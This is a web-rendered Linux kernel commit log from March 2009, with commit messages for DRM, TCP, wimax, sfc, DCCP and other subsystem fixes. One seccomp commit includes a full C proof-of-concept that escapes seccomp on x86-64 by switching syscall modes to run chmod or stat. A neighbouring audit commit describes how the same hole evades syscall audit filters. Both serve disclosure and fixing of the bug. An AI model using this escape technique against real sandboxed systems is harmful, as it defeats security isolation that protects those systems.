1
0
Fork 0
Commit Graph

133374 Commits (39d89cd34d9900cd2415f46e179b91cdd14b15fe)

Author SHA1 Message Date
Eric Anholt 299eb93c5f drm/i915: Fix use-before-null-check in i915_irq_emit().
This could be triggered by a client asking to emit an irq when the device
wasn't initialized.

Signed-off-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:53:05 +10:00
Thomas Hellstrom fda714c29c drm: Avoid client deadlocks when the master disappears.
This is done by
1) Wake up lock waiters when we close the master file descriptor.
   Not when the master structure is removed, since the latter
   requires the waiters themselves to release the refcount on the
   master structure -> Deadlock.
2) Send a SIGTERM to all clients waiting for the lock.
   Normally these clients will get a SIGPIPE when the X server dies,
   but clients may also spin trying to grab the DRM lock, without
   getting any sort of notification.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:50:20 +10:00
Thomas Hellstrom 171901d15d drm: Wake up all lock waiters when the master disappears.
Currently only one waiter is woken up, leaving other waiters
hanging waiting for the DRM lock.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:49:54 +10:00
Thomas Hellstrom 4d77c88e91 drm: Don't return ERESTARTSYS to user-space.
That return code is for in-kernel use only.
Use EINTR instead.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:49:46 +10:00
Randy Dunlap 155b25bcc2 menu: fix embedded menu snafu
The COMPAT_BRK kconfig symbol does not depend on EMBEDDED, but it is in
the midst of the EMBEDDED menu symbols, so it mucks up the EMBEDDED
menu.  Fix by moving it to just after all of the EMBEDDED menu symbols.

Also, surround all of the EMBEDDED symbols with "if EMBEDDED"/"endif" so
that this EMBEDDED block is clearer.

Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:49:16 -08:00
Linus Torvalds d86a1c3de5 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc:
  sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip
  sdhci: Add quirk for controllers with no end-of-busy IRQ
2009-03-02 15:48:00 -08:00
Linus Torvalds bd5e89c813 Merge branch 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6
* 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6:
  ALSA: hda - Add probe_mask default for Toshiba laptop with ALC268
  ALSA: hda - Add quirk for new HP xw series
  ALSA: hda - Fix digital mic on dell-m4-1 and dell-m4-3
2009-03-02 15:47:19 -08:00
Linus Torvalds 2d44947a56 Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  fix warning in io_mapping_map_wc()
  x86: i915 needs pgprot_writecombine() and is_io_mapping_possible()
2009-03-02 15:47:01 -08:00
Linus Torvalds 359aa09be9 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (29 commits)
  zaurus: add usb id for motomagx phones
  usbnet: make usbnet_get_link() fall back to ethtool_op_get_link()
  veth: Fix carrier detect
  cdc_ether: add usb id for Ericsson F3507g
  r8169: read MAC address from EEPROM on init (2nd attempt)
  tcp: fix retrans_out leaks
  net headers: export dcbnl.h
  net headers: cleanup dcbnl.h
  netpoll: Add drop checks to all entry points
  gianfar: Do right check on num_txbdfree
  pkt_sched: sch_drr: Fix oops in drr_change_class.
  b44: Disable device on shutdown
  b44: Unconditionally enable interrupt routing on reset
  net: fix hp-plus build error
  libertas: fix misuse of netdev_priv() and dev->ml_priv
  ipv6: don't use tw net when accounting for recycled tw
  asix: new device ids
  tcp_scalable: Update malformed & dead url
  netfilter: xt_recent: fix proc-file addition/removal of IPv4 addresses
  netxen: handle pci bar 0 mapping failure
  ...
2009-03-02 15:46:09 -08:00
Linus Torvalds c742b4bf7a Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6:
  selinux: Fix a panic in selinux_netlbl_inode_permission()
2009-03-02 15:44:08 -08:00
Karsten Keil fbfd8b5622 Change email address
Since I will loose the old address soon, please change it.

Signed-off-by: Karsten Keil <kkeil@linux-pingi.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:43:40 -08:00
Linus Torvalds 6b3bf20491 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input:
  Input: elantech - touchpad driver miss-recognising logitech mice
  Input: synaptics - ensure we reset the device on resume
  Input: usbtouchscreen - fix eGalax HID ignoring
  Input: ambakmi - fix timeout handling in amba_kmi_write()
  Input: pxa930_trkball - fix write timeout handling
  Input: struct device - replace bus_id with dev_name(), dev_set_name()
  Input: bf54x-keys - fix debounce time validation
  Input: spitzkbd - mark probe function as __devinit
  Input: omap-keypad - mark probe function as __devinit
  Input: corgi_ts - mark probe function as __devinit
  Input: corgikbd - mark probe function as __devinit
  Input: uvc - the button on the camera is KEY_CAMERA
  Input: psmouse - make MOUSE_PS2_LIFEBOOK depend on X86
  Input: atkbd - make forced_release_keys[] static
  Input: usbtouchscreen - allow reporting calibrated data
2009-03-02 15:43:03 -08:00
Linus Torvalds 36b31106b7 Merge branch 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4
* 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4:
  ext4: don't call jbd2_journal_force_commit_nested without journal
  ext4: Reorder fs/Makefile so that ext2 root fs's are mounted using ext2
  ext4: Remove duplicate call to ext4_commit_super() in ext4_freeze()
2009-03-02 15:42:26 -08:00
Linus Torvalds 7b88ed671a Merge git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6
* git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6:
  [SCSI] mpt: fix disable lsi sas to use msi as default
  [SCSI] fix ABORTED_COMMAND looping forever problem
  [SCSI] sd: revive sd_index_lock
  [SCSI] cxgb3i: update the driver version to 1.0.1
  [SCSI] cxgb3i: Fix spelling errors in documentation
  [SCSI] cxgb3i: added missing include in cxgb3i_ddp.h
  [SCSI] cxgb3i: Outgoing pdus need to observe skb's MAX_SKB_FRAGS
  [SCSI] cxgb3i: added per-task data to track transmit progress
  [SCSI] cxgb3i: transmit work-request fixes
  [SCSI] hptiop: Add new PCI device ID
2009-03-02 15:41:59 -08:00
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
Roland McGrath ccbe495caa x86-64: syscall-audit: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases, audit_syscall_entry() will use the wrong system
call number table and the wrong system call argument registers.  This
could be used to circumvent a syscall audit configuration that filters
based on the syscall numbers or argument details.

Signed-off-by: Roland McGrath <roland@redhat.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
Andres Salomon a0874897b1 sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip
As described here: http://lkml.org/lkml/2009/2/20/265

The CAFE chip is broken due to commit e809517f6f.
Anton added a quirk here: http://lkml.org/lkml/2009/2/20/279 that fixes
CAFE's problem.  This adds the quirk for CAFE.

Signed-off-by: Andres Salomon <dilinger@debian.org>
Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02 21:48:20 +01:00
Ben Dooks f945405cde sdhci: Add quirk for controllers with no end-of-busy IRQ
The Samsung SDHCI (and FSL eSDHC) controller block seems to fail
to generate an INT_DATA_END after the transfer has completed and
the bus busy state finished.

Changes in e809517f6f to use the
new busy method are the cause of the behaviour change.

Signed-off-by: Ben Dooks <ben-linux@fluff.org>
Signed-off-by: Anton Vorontsov <avorontsov@ru.mvista.com>
Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02 21:46:35 +01:00
Randy Dunlap d3a21be86c skbuff.h: fix timestamps kernel-doc
Fix skbuff.h kernel-doc for timestamps: must include "struct" keyword,
otherwise there are kernel-doc errors:

Error(linux-next-20090227//include/linux/skbuff.h:161): cannot understand prototype: 'struct skb_shared_hwtstamps '
Error(linux-next-20090227//include/linux/skbuff.h:177): cannot understand prototype: 'union skb_shared_tx '

Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:58 -08:00
Ben Hutchings 94f52cd152 sfc: Add support for SFN4112F SFP+ reference design
Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:07 -08:00
Ben Hutchings 8129d2173e sfc: Clean up LED control
Reinitialise LEDs after overriding them for identification.

Rename set_fault_led method to set_id_led since we always use it for
NIC identification and not faults.

Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:05 -08:00
Ben Hutchings b4a44a6987 sfc: Delete unused efx_blinker::led_num field
Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:05 -08:00
Ben Hutchings d2d2c37314 sfc: Add support for QT2025C PHY
This is a new PHY supporting SFP+ modules, used in the SFN4112F
reference design.  It is similar to the QT2022C2 and shares much of
its support code.

Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:04 -08:00
Ben Hutchings 3f39a5e9bf sfc: Fix reporting of PHY id
Shuffle bits of the OUI into the conventional written order.

Replace PHY id component macros with functions.

Zero-pad PHY id components in log messages.

Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:04 -08:00
Ben Hutchings f794fd4400 sfc: Remove "XFP" from log messages that are not specific to XFP
Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:03 -08:00
Ben Hutchings 190dbcfd68 sfc: SFT9001/SFN4111T: Check PHY boot status during board initialisation
During SFN4111T initialisation, check whether the PHY boot status
indicates a bad firmware checksum.  If so, prepare to reflash rather
than continuing with normal initialisation.

Remove redundant PHY boot status check from tenxpress_phy_init().

Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:03 -08:00
Ben Hutchings 7b065f91fa sfc: Fix test for MDIO read failure
Commit 27dd2caca4 changed
mdio_clause45_check_mmds() to read both DEVS0 and DEVS1 registers and
to combine their values into an unsigned 32-bit mask.  This made the
following test for a negative (failure) value useless.  Fix it to
check whether either read failed.

Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:02 -08:00
Ben Hutchings 22ef02c23a sfc: SFT9001: Include non-breaking cable diagnostics in online self-tests
Signed-off-by: Ben Hutchings <bhutchings@solarflare.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:15:02 -08:00
Inaky Perez-Gonzalez c747583d19 wimax/i2400m: implement RX reorder support
Allow the device to give the driver RX data with reorder information.

When that is done, the device will indicate the driver if a packet has
to be held in a (sorted) queue. It will also tell the driver when held
packets have to be released to the OS.

This is done to improve the WiMAX-protocol level retransmission
support when missing frames are detected.

The code docs provide details about the implementation.

In general, this just hooks into the RX path in rx.c; if a packet with
the reorder bit in the RX header is detected, the reorder information
in the header is extracted and one of the four main reorder operations
are executed. In one case (queue) no packet will be delivered to the
networking stack, just queued, whereas in the others (reset, update_ws
and queue_update_ws), queued packet might be delivered depending on
the window start for the specific queue.

The modifications to files other than rx.c are:

- control.c: during device initialization, enable reordering support
  if the rx_reorder_disabled module parameter is not enabled

- driver.c: expose a rx_reorder_disable module parameter and call
  i2400m_rx_setup/release() to initialize/shutdown RX reorder
  support.

- i2400m.h: introduce members in 'struct i2400m' needed for
  implementing reorder support.

- linux/i2400m.h: introduce TLVs, commands and constant definitions
  related to RX reorder

Last but not least, the rx reorder code includes an small circular log
where the last N reorder operations are recorded to be displayed in
case of inconsistency. Otherwise diagnosing issues would be almost
impossible.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:28 -08:00
Harvey Harrison 61b8d2688a wimax: replace uses of __constant_{endian}
Base versions handle constant folding now.

Edited by Inaky to fix conflicts due to changes in netdev.c

Signed-off-by: Harvey Harrison <harvey.harrison@gmail.com>
Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:27 -08:00
Inaky Perez-Gonzalez fd5c565c0c wimax/i2400m: support extended data RX protocol (no need to reallocate skbs)
Newer i2400m firmwares (>= v1.4) extend the data RX protocol so that
each packet has a 16 byte header. This header is mainly used to
implement host reordeing (which is addressed in later commits).

However, this header also allows us to overwrite it (once data has
been extracted) with an Ethernet header and deliver to the networking
stack without having to reallocate the skb (as it happened in fw <=
v1.3) to make room for it.

- control.c: indicate the device [dev_initialize()] that the driver
  wants to use the extended data RX protocol. Also involves adding the
  definition of the needed data types in include/linux/wimax/i2400m.h.

- rx.c: handle the new payload type for the extended RX data
  protocol. Prepares the skb for delivery to
  netdev.c:i2400m_net_erx().

- netdev.c: Introduce i2400m_net_erx() that adds the fake ethernet
  address to a prepared skb and delivers it to the networking
  stack.

- cleanup: in most instances in rx.c, the variable 'single' was
  renamed to 'single_last' for it better conveys its meaning.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:26 -08:00
Kay Sievers 347707baa7 wimax: struct device - replace bus_id with dev_name(), dev_set_name()
Cc: inaky.perez-gonzalez@intel.com
Cc: linux-wimax@intel.com
Acked-by: Greg Kroah-Hartman <gregkh@suse.de>
Signed-off-by: Kay Sievers <kay.sievers@vrfy.org>
Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:26 -08:00
Inaky Perez-Gonzalez 8987691a4a wimax/i2400m: allow control of the base-station idle mode timeout
For power saving reasons, WiMAX links can be put in idle mode while
connected after a certain time of the link not being used for tx or
rx. In this mode, the device pages the base-station regularly and when
data is ready to be transmitted, the link is revived.

This patch allows the user to control the time the device has to be
idle before it decides to go to idle mode from a sysfs
interace.

It also updates the initialization code to acknowledge the module
variable 'idle_mode_disabled' when the firmware is a newer version
(upcoming 1.4 vs 2.6.29's v1.3).

The method for setting the idle mode timeout in the older firmwares is
much more limited and can be only done at initialization time. Thus,
the sysfs file will return -ENOSYS on older ones.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:25 -08:00
Inaky Perez-Gonzalez 6a0f7ab830 wimax/i2400m: firmware_check() encodes the firmware version in i2400m->fw_version
Upcoming modifications will need to test for the running firmware
version before activating a feature or not. This is helpful to
implement backward compatibility with older firmware versions.

Modify i2400m_firmware_check() to encode in i2400m->fw_version the
major and minor version numbers of the firmware interface.

As well, move the call to be done as the very first operation once we
have communication with the device during probe() [in
__i2400m_dev_start()]. This is needed so any operation that is
executed afterwards can determine which fw version it is talking to.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:24 -08:00
Inaky Perez-Gonzalez efa05d0f0a wimax/i2400m: drop support for deprecated major fw interface, add for new minor
Firmware interface version 8.x.x has long been deprecated and is no
longer supported (nor available, as it is a preproduction firmware),
so it can be safely dropped.

Add support for firmware interface v9.2.x (current is 9.1.x). Firmware
version 9.2.x is backwards compatible with 9.1.x; new features are
enabled if switches are pressed to turn them on. Forthcoming commits
to the driver will start pressing those switches when the firmware
interface supports it.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:23 -08:00
Inaky Perez-Gonzalez 1039abbc5b wimax/i2400m: add the ability to fallback to other firmware files if the default is not there
In order to support backwards compatibility with older firmwares when
a driver is updated by a new kernel release, the i2400m bus drivers
can declare a list of firmware files they can work with (in general
these will be each a different version). The firmware loader will try
them in sequence until one loads.

Thus, if a user doesn't have the latest and greatest firmware that a
newly installed kernel would require, the driver would fall back to
the firmware from a previous release.

To support this, the i2400m->bus_fw_name is changed to be a NULL
terminated array firmware file names (and renamed to bus_fw_names) and
we add a new entry (i2400m->fw_name) that points to the name of the
firmware being currently used. All code that needs to print the
firmware file name uses i2400m->fw_name instead of the old
i2400m->bus_fw_name.

The code in i2400m_dev_bootstrap() that loads the firmware is changed
with an iterator over the firmware file name list that tries to load
each form user space, using the first one that succeeds in
request_firmware() (and thus stopping the iteration).

The USB and SDIO bus drivers are updated to take advantage of this and
reflect which firmwares they support.

Signed-off-by: Inaky Perez-Gonzalez <inaky@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:10:23 -08:00
Gerrit Renker 86739fb96e dccp: Do not let initial option overhead shrink the MPS
This fixes a problem caused by the overlap of the connection-setup and
established-state phases of DCCP connections.

During connection setup, the client retransmits Confirm Feature-Negotiation
options until a response from the server signals that it can move from the
half-established PARTOPEN into the OPEN state, whereupon the connection is
fully established on both ends (RFC 4340, 8.1.5).

However, since the client may already send data while it is in the PARTOPEN
state, consequences arise for the Maximum Packet Size: the problem is that the
initial option overhead is much higher than for the subsequent established
phase, as it involves potentially many variable-length list-type options
(server-priority options, RFC 4340, 6.4).

Applying the standard MPS is insufficient here: especially with larger
payloads this can lead to annoying, counter-intuitive EMSGSIZE errors.

On the other hand, reducing the MPS available for the established phase by
the added initial overhead is highly wasteful and inefficient.

The solution chosen therefore is a two-phase strategy:

   If the payload length of the DataAck in PARTOPEN is too large, an Ack is sent
   to carry the options, and the feature-negotiation list is then flushed.

   This means that the server gets two Acks for one Response. If both Acks get
   lost, it is probably better to restart the connection anyway and devising yet
   another special-case does not seem worth the extra complexity.

The result is a higher utilisation of the available packet space for the data
transmission phase (established state) of a connection.

The patch (over-)estimates the initial overhead to be 32*4 bytes -- commonly
seen values were around 90 bytes for initial feature-negotiation options.

It uses sizeof(u32) to mean "aligned units of 4 bytes".
For consistency, another use of 4-byte alignment is adapted.

Signed-off-by: Gerrit Renker <gerrit@erg.abdn.ac.uk>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:07:23 -08:00
Gerrit Renker 361a5c1dd0 dccp: Minimise header option overhead in setting the MPS
This patch resolves a long-standing FIXME to dynamically update the Maximum
Packet Size depending on actual options usage.

It uses the flags set by the feature-negotiation infrastructure to compute
the required header option size.

Most options are fixed-size, a notable exception are Ack Vectors (required
currently only by CCID-2). These can have any length between 3 and 1020
bytes. As a result of testing, 16 bytes (2 bytes for type/length plus 14 Ack
Vector cells) have been found to be sufficient for loss-free situations.

There are currently no CCID-specific header options which may appear on data
packets, thus it is not necessary to define a corresponding CCID field as
suggested in the old comment.

Further changes:
----------------
 Adjusted the type of 'cur_mps' to match the unsigned return type of the
 function.

Signed-off-by: Gerrit Renker <gerrit@erg.abdn.ac.uk>
Acked-by: Ian McDonald <ian.mcdonald@jandi.co.nz>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:07:23 -08:00
Ilpo Järvinen 9ce0146102 tcp: get rid of two unnecessary u16s in TCP skb flags copying
I guess these fields were one day 16-bit in the struct but
nowadays they're just using 8 bits anyway.

This is just a precaution, didn't result any change in my
case but who knows what all those varying gcc versions &
options do. I've been told that 16-bit is not so nice with
some cpus.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:17 -08:00
Ilpo Järvinen 0d6a775e27 tcp: in sendmsg/pages open code the real goto target
copied was assigned zero right before the goto, so if (copied)
cannot ever be true.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:16 -08:00
Ilpo Järvinen cabeccbd17 tcp: kill eff_sacks "cache", the sole user can calculate itself
Also fixes insignificant bug that would cause sending of stale
SACK block (would occur in some corner cases).

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:16 -08:00
Ilpo Järvinen 758ce5c8d1 tcp: add helper for AI algorithm
It seems that implementation in yeah was inconsistent to what
other did as it would increase cwnd one ack earlier than the
others do.

Size benefits:

  bictcp_cong_avoid |  -36
  tcp_cong_avoid_ai |  +52
  bictcp_cong_avoid |  -34
  tcp_scalable_cong_avoid |  -36
  tcp_veno_cong_avoid |  -12
  tcp_yeah_cong_avoid |  -38

= -104 bytes total

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:15 -08:00
Ilpo Järvinen 571a5dd8d0 htcp: merge icsk_ca_state compare
Similar to what is done elsewhere in TCP code when double
state checks are being done.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:14 -08:00
Ilpo Järvinen e6c7d08579 tcp: drop unnecessary local var in collapse
Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:13 -08:00
Ilpo Järvinen bc079e9ede tcp: cleanup ca_state mess in tcp_timer
Redundant checks made indentation impossible to follow.
However, it might be useful to make this ca_state+is_sack
indexed array.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:13 -08:00
Ilpo Järvinen 7363a5b233 tcp: separate timeout marking loop to it's own function
Some comment about its current state added. So far I have
seen very few cases where the thing is actually useful,
usually just marginally (though admittedly I don't usually
see top of window losses where it seems possible that there
could be some gain), instead, more often the cases suffer
from L-marking spike which is certainly not desirable
(I'll bury improving it to my todo list, but on a low
prio position).

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:12 -08:00
Ilpo Järvinen d0af4160d1 tcp: remove redundant code from tcp_mark_lost_retrans
Arnd Hannemann <hannemann@nets.rwth-aachen.de> noticed and was
puzzled by the fact that !tcp_is_fack(tp) leads to early return
near the beginning and the later on tcp_is_fack(tp) was still
used in an if condition. The later check was a left-over from
RFC3517 SACK stuff (== !tcp_is_fack(tp) behavior nowadays) as
there wasn't clear way how to handle this particular check
cheaply in the spirit of RFC3517 (using only SACK blocks, not
holes + SACK blocks as with FACK). I sort of left it there as
a reminder but since it's confusing other people just remove
it and comment the missing-feature stuff instead.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Cc: Arnd Hannemann <hannemann@nets.rwth-aachen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:11 -08:00
Ilpo Järvinen 02276f3c96 tcp: fix corner case issue in segmentation during rexmitting
If cur_mss grew very recently so that the previously G/TSOed skb
now fits well into a single segment it would get send up in
parts unless we calculate # of segments again. This corner-case
could happen eg. after mtu probe completes or less than
previously sack blocks are required for the opposite direction.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:11 -08:00
Ilpo Järvinen d3d2ae4545 tcp: Don't clear hints when tcp_fragmenting
1) We didn't remove any skbs, so no need to handle stale refs.

2) scoreboard_skb_hint is trivial, no timestamps were changed
   so no need to clear that one

3) lost_skb_hint needs tweaking similar to that of
   tcp_sacktag_one().

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:10 -08:00
Ilpo Järvinen 62ad27619c tcp: deferring in middle of queue makes very little sense
If skb can be sent right away, we certainly should do that
if it's in the middle of the queue because it won't get
more data into it.

Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 03:00:10 -08:00